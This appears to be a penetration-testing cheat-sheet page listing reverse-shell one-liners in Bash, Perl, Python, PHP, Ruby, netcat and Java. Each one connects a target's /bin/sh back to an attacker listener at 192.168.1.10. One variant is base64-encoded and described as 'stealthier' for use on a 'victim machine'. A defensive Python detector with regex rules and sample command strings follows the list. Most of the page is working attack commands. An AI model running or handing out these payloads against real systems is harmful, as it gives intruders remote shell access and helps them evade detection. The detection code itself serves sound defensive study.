# Alternate Reverse Shells

Reverse shells using netcat are often not possible because the tool is not installed on the target system. In such cases, other scripting languages or tools can be used to initiate the reverse shell. Here are reverse shell commands using various technologies.

{% hint style="info" %}
Netcat should be started on your system before any of the following commands are executed. For these examples we will assume netcat to be listening on IP 192.168.1.10 and port 80.
{% endhint %}

<details>

<summary>Bash</summary>

```
bash -i >& /dev/tcp/192.168.1.10/80 0>&1
```

</details>

<details>

<summary>Stealthier Method</summary>

Base64-encode the command:

```
echo "bash -c 'bash -i >& /dev/tcp/192.168.45.2/443 0>&1'" | base64 -w0
```

Use the output on the victim machine with the base64 decode command (the string below is a sample generated for a different address and port):

```
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
```

</details>

<details>

<summary>Perl</summary>

```
perl -e 'use Socket;$i="192.168.1.10";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

</details>

<details>

<summary>Python</summary>

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

</details>

<details>

<summary>PHP</summary>

```
php -r '$sock=fsockopen("192.168.1.10",80);exec("/bin/sh -i <&3 >&3 2>&3");'
```

</details>

<details>

<summary>Ruby</summary>

```
ruby -rsocket -e'f=TCPSocket.open("192.168.1.10",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

</details>

<details>

<summary>Netcat</summary>

I am including netcat as well for easy reference:

```shell
nc -e /bin/sh 192.168.1.194 80
```

If the client has the wrong version of netcat (one without the `-e` option), the following command may come in handy, as pointed out by Jeff Price:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.10 80 >/tmp/f
```

</details>

<details>

<summary>Java</summary>

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.10/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

</details>
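From the defender's side, the one-liners above leave recognizable strings in recorded command lines, including the base64-wrapped variant once the token is decoded. The following is an added example, not part of the original page: the rule names, the `classify` helper and the sample events are constructed for illustration.

```python
import base64
import binascii
import re

# Indicators taken from the one-liners above; the rule names are invented for this example.
RULES = {
    "dev_tcp_redirect": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "nc_exec_shell": re.compile(r"\bnc(?:at)?\b.*\s-e\s+/bin/(?:ba)?sh"),
    "fifo_shell_nc": re.compile(r"mkfifo\s+\S+.*\|\s*/bin/(?:ba)?sh\b.*\|\s*nc\b"),
    "script_socket_shell": re.compile(
        r"\b(?:perl|python\d?|php|ruby)\b.*(?:socket|fsockopen)\b.*/bin/(?:ba)?sh", re.I),
    "decode_pipe_shell": re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh\b"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decoded_blobs(cmdline):
    """Yield text recovered from long base64-looking tokens in a command line."""
    for token in B64_TOKEN.findall(cmdline):
        try:
            yield base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text: ignore


def classify(cmdline):
    """Return the sorted names of rules matching the command line or a decoded blob."""
    hits = {name for name, rx in RULES.items() if rx.search(cmdline)}
    for text in decoded_blobs(cmdline):
        hits |= {name + "(decoded)" for name, rx in RULES.items() if rx.search(text)}
    return sorted(hits)


# Constructed command strings (not real telemetry), using this page's address and port.
_ENCODED = base64.b64encode(b"bash -i >& /dev/tcp/192.168.1.10/80 0>&1").decode()
SAMPLE_EVENTS = [
    "bash -c 'bash -i >& /dev/tcp/192.168.1.10/80 0>&1'",
    f"echo {_ENCODED} | base64 -d | bash",
    "nc -e /bin/sh 192.168.1.10 80",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.10 80 >/tmp/f",
    "python3 manage.py runserver 0.0.0.0:8000",  # benign
    "base64 -d backup.b64",                      # benign
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(classify(event) or "clean", "<-", event[:60])
```

String rules like these are a triage aid: they miss renamed binaries and other encodings, so pair them with network telemetry such as a shell process holding an outbound socket.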

## Other Resources

<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python>
